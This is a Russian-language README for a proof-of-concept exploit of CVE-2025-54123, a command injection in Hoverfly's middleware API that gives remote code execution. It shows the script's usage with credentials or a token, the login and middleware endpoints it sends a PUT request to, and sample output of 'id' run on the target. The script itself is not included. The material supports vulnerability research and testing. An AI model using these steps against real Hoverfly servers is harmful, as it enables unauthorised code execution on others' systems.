
Python-доказательство концепции для CVE-2025-54123, демонстрирующее внедрение команд, ведущее к удаленному выполнению кода (RCE) в API промежуточного ПО Hoverfly с аутентификацией на основе учетных данных или токена.
Этот репозиторий содержит Python-скрипт Proof of Concept (PoC) для взаимодействия с экземплярами Hoverfly, затронутыми уязвимостью CVE-2025-54123.
Скрипт поддерживает:
Предупреждение
Данный проект предназначен исключительно для авторизованных исследований безопасности, тестирования и образовательных целей. Не используйте его против систем без явного разрешения.
Установка зависимостей:
pip install requests
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
-u admin \
-p password \
--cmd "id"
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
--token <ACCESS_TOKEN> \
--cmd "id"
| Аргумент | Описание |
|---|---|
--target | Домен или IP-адрес цели |
--port | Порт целевого сервиса |
-u | Имя пользователя Hoverfly |
-p | Пароль Hoverfly |
--token | Существующий Bearer-токен |
--cmd | Строка команды, передаваемая в эндпоинт middleware |
При предоставлении учётных данных:
/api/token-auth
Скрипт взаимодействует с:
/api/v2/hoverfly/middleware
используя аутентифицированный PUT-запрос.
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)
.
├── CVE-2025-54123.py
└── README.md
Этот репозиторий предоставляется исключительно в образовательных целях, для обеспечения безопасности защиты и авторизованного тестирования. Автор не несёт ответственности за неправомерное использование, ущерб или юридические последствия, возникшие в результате использования данного программного обеспечения.